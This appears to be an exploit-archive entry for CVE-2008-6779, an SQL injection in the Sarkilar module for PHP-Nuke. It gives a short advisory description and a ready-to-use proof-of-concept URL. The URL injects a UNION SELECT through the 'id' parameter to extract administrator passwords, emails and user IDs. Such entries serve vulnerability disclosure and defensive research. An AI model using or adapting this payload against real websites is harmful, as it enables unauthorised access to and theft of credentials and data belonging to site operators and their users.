PHP-Nuke Sarkilar Module - 'id' SQL Injection
Author: r45c4l
type: webapps
platform: php
port:
date_added: 2008-10-20
date_updated: 2014-03-25
verified: 1
codes: CVE-2008-6779;OSVDB-54202
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/31830/info
Sarkilar module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=Sarkilar&op=showcontent&id=-1+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors--